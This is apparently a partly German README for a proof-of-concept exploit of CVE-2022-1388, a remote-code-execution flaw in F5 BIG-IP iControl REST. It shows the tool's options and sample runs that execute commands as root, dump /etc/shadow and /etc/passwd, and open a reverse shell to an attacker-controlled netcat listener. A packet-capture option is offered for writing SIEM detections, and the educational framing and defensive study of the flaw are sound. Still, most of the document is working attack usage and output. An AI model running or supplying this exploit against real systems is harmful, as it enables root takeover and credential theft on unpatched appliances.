
-- NUR FÜR BILDUNGSZWECKE -- Proof-of-Concept-RCE für CVE-2022-1388, plus einige zusätzliche Funktionen für Blue- und Red-Teams
Der Autor ist nicht verantwortlich oder haftbar für Handlungen, die mit irgendeinem Aspekt dieses Projekts/Repositorys durchgeführt werden. Ich habe dies erstellt, um den Angriff zu verstehen sowie Erkennungen in einem SIEM zu schreiben, und wollte es mit anderen teilen, die dasselbe tun möchten. Nutzung auf eigene Gefahr.
Dieser Exploit zielt auf die BIG-IP iControl REST-Schwachstelle CVE-2022-1388 in F5-Systemen ab. Siehe das F5 Advisory (https://support.f5.com/csp/article/K23605346) für betroffene Versionen und weitere Informationen.
Gerne Pull Requests oder Issue-Meldungen. Getestet wurde dies auf einigen verwundbaren F5 VEs in Google Cloud von einer CentOS-Maschine mit Python 3.6
CVE-2022-1388.py [-h] -t TARGET -p PORT [-c CMD] [-s] [-e] [-lh LHOST] [-lp LPORT]
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET, --RHOSTS TARGET
Target IP of vulnerable BIG-IP system
-p PORT, --port PORT, --RPORT PORT
Target port on vulnerable BIG-IP system
-c CMD, --cmd CMD, --command CMD
Command to run on target system
-e, --export, --tcpdump
Export captured traffic and ssl-key.log | **Requires sudo privileges!
-q, --quiet Don't display banner
-s, --shell Launch an interactive shell
-lh LHOST, --lhost LHOST, --LHOST LHOST
Required for -s [shell]; Local IP/interface to bind listener to
-lp LPORT, --lport LPORT, --LPORT LPORT
Required for -s [shell]; Local port to bind listener to
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c id
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/shadow" -q
root:!!:18656:0:99999:7:::
bin:*:16479:0:99999:7:::
daemon:*:16479:0:99999:7:::
adm:*:16479:0:99999:7:::
lp:*:16479:0:99999:7:::
mail:*:16479:0:99999:7:::
uucp:*:16479:0:99999:7:::
[[ removed for brevity ]]
Angreifer:
$ python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -s -lh 10.142.0.8 -lp 4444
===============================================================================================================
[+] CVE-2022-1388 Exploit affecting F5 BIG-IP
[+] Author: vaelwolf
[+] Remediation:
Upgrade to a patched version found in the vendor advisory: https://support.f5.com/csp/article/K23605346
[!] For educational use only! Use at your own risk.
===============================================================================================================
[+] If you haven't already, please start your listener of choice on port 4444
[+] Press any key to continue...
[+] Exploit finished. If you launched a reverse shell listener, check there for your terminal!
Listener:
$ nc -lp 4444
bash: no job control in this shell
[@localhost:Active:Standalone] restjavad # whoami
whoami
root
Die Angabe der Option -e (--export) erzeugt zwei Dateien: detection.pcap und ssl-key.log. Diese Dateien werden bei jeder Angabe der Option -e überschrieben. Denken Sie also daran, die Dateien, die Sie behalten möchten, zu verschieben oder umzubenennen. Die ssl-key.log kann in Wireshark über Einstellungen -> Protokolle -> TLS -> (Pre)-Master-Secret-Logdateiname importiert werden, um die TLS-Sitzung zu entschlüsseln. Beachten Sie, dass das Skript aufgrund von tcpdump bei Verwendung von -e als sudo ausgeführt werden muss.
$ sudo python3 CVE-2022-1388.py -t 10.142.0.10 -p 8443 -c "cat /etc/passwd" -q -e
[+] Starting tcpdump on port 8443 for 5 seconds
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
[[ removed for brevity ]]
Vor TLS-Entschlüsselung:
Hinzufügen der automatisch exportierten ssl-key.log zu den TLS-Einstellungen in Wireshark:
Nach TLS-Entschlüsselung:
